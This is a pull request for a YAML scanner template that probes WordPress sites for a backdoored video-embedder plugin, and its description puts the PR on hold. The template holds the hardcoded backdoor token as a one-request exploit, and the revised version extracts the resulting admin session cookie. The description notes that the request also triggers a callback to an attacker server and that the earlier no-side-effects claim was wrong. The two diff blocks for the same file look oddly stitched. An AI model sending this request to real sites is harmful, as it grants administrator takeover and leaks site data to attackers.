### PR TITLE
Add CVE-2026-18072 template

### DIFF
--- a/http/cves/2026/CVE-2026-18072.yaml
+++ b/http/cves/2026/CVE-2026-18072.yaml
@@ -1,47 +1,60 @@
 id: CVE-2026-18072
 
 info:
-  name: Advanced Responsive Video Embedder - Hardcoded Backdoor
+  name: Advanced Responsive Video Embedder 10.8.7/10.8.8 - Hardcoded Backdoor Authentication Bypass
   author: str4k3r
   severity: critical
-  description: >
-    The compromised Advanced Responsive Video Embedder WordPress plugin
-    releases 10.8.7 and 10.8.8 accept a hardcoded token through the
-    `_wplogin` parameter and establish an administrator session before normal
-    authentication. A single unauthenticated request is enough to trigger the
-    backdoor; this detector only checks the redirect and session-cookie
-    response and does not perform an administrative action.
+  description: |
+    The compromised Advanced Responsive Video Embedder WordPress plugin releases 10.8.7 and 10.8.8 accept a hardcoded token through the `_wplogin` parameter and establish an authenticated administrator session before normal authentication. A single unauthenticated GET request triggers the backdoor. This template only inspects the redirect and session-cookie response and does not perform any administrative action.
+  impact: |
+    An unauthenticated attacker gains a full administrator session on the WordPress site, allowing complete takeover including plugin/theme editing, arbitrary PHP execution, and data theft.
+  remediation: |
+    Immediately remove the Advanced Responsive Video Embedder plugin versions 10.8.7 and 10.8.8, reinstall a known-clean release, rotate all secrets and passwords, and audit for rogue administrator accounts and web shells created after the backdoor was published.
   reference:
     - https://www.wordfence.com/blog/2026/07/wordfence-prism-detected-backdoored-wordpress-plugin-within-two-hours-of-it-being-introduced/
     - https://plugins.trac.wordpress.org/browser/advanced-responsive-video-embedder/tags/10.8.7/php/fn-update-check.php
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-18072
   classification:
-    cve-id: CVE-2026-18072
-    cwe-id: CWE-798
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
+    cve-id: CVE-2026-18072
+    cwe-id: CWE-798
   metadata:
     verified: true
     max-request: 1
     vendor: advanced-responsive-video-embedder
     product: advanced-responsive-video-embedder
-    technology: wordpress, php
-  tags: cve,cve2026,wordpress,wp-plugin,backdoor,authbypass,unauth
+    framework: wordpress
+    shodan-query: http.html:"advanced-responsive-video-embedder"
+    fofa-query: body="advanced-responsive-video-embedder"
+  tags: cve,cve2026,wordpress,wp-plugin,wp,backdoor,authbypass,unauth,arve
 
 http:
   - method: GET
     path:
       - "{{BaseURL}}/?_wplogin=35fe7057ffed92ff7bc5a0b90f302a77fb5843ad6c972294d68da0b0553b3900"
+
     redirects: false
+
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 302
       - type: word
         part: header
         words:
           - "/wp-admin/"
+
       - type: regex
         part: header
         regex:
-          - "(?i)Set-Cookie:\\s*wordpress_logged_in_"
+          - "(?i)set-cookie:\\s*wordpress_logged_in_[a-f0-9]{32}="
+
+      - type: status
+        status:
+          - 302
+
+    extractors:
+      - type: regex
+        part: header
+        group: 1
+        regex:
+          - "(?i)wordpress_logged_in_[a-f0-9]{32}=([^;]+)"

--- a/http/cves/2026/CVE-2026-18072.yaml
+++ b/http/cves/2026/CVE-2026-18072.yaml
@@ -1,0 +1,47 @@
+id: CVE-2026-18072
+
+info:
+  name: Advanced Responsive Video Embedder - Hardcoded Backdoor
+  author: str4k3r
+  severity: critical
+  description: >
+    The compromised Advanced Responsive Video Embedder WordPress plugin
+    releases 10.8.7 and 10.8.8 accept a hardcoded token through the
+    `_wplogin` parameter and establish an administrator session before normal
+    authentication. A single unauthenticated request is enough to trigger the
+    backdoor; this detector only checks the redirect and session-cookie
+    response and does not perform an administrative action.
+  reference:
+    - https://www.wordfence.com/blog/2026/07/wordfence-prism-detected-backdoored-wordpress-plugin-within-two-hours-of-it-being-introduced/
+    - https://plugins.trac.wordpress.org/browser/advanced-responsive-video-embedder/tags/10.8.7/php/fn-update-check.php
+  classification:
+    cve-id: CVE-2026-18072
+    cwe-id: CWE-798
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: advanced-responsive-video-embedder
+    product: advanced-responsive-video-embedder
+    technology: wordpress, php
+  tags: cve,cve2026,wordpress,wp-plugin,backdoor,authbypass,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?_wplogin=35fe7057ffed92ff7bc5a0b90f302a77fb5843ad6c972294d68da0b0553b3900"
+    redirects: false
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 302
+      - type: word
+        part: header
+        words:
+          - "/wp-admin/"
+      - type: regex
+        part: header
+        regex:
+          - "(?i)Set-Cookie:\\s*wordpress_logged_in_"


### PR DESCRIPTION
## Submission on hold: probe has unsafe side effects

The current request invokes the plugin's hardcoded login backdoor. Wordfence's source analysis documents that a successful invocation also calls `_arve_uc_cb()`, which sends the site URL and selected administrator username to an attacker-controlled C2 service, then creates a persistent administrator session.

The earlier assertion that this probe does not change state was incorrect. Inspecting only the redirect and cookie does not prevent these server-side effects. This PR is now a draft and the current template should not be used for scanning or merged.

A replacement would need an independently validated detector that does not invoke the backdoor, issue a session, or trigger its outbound callback. No such replacement is claimed here.

Source: https://www.wordfence.com/blog/2026/07/wordfence-prism-detected-backdoored-wordpress-plugin-within-two-hours-of-it-being-introduced/
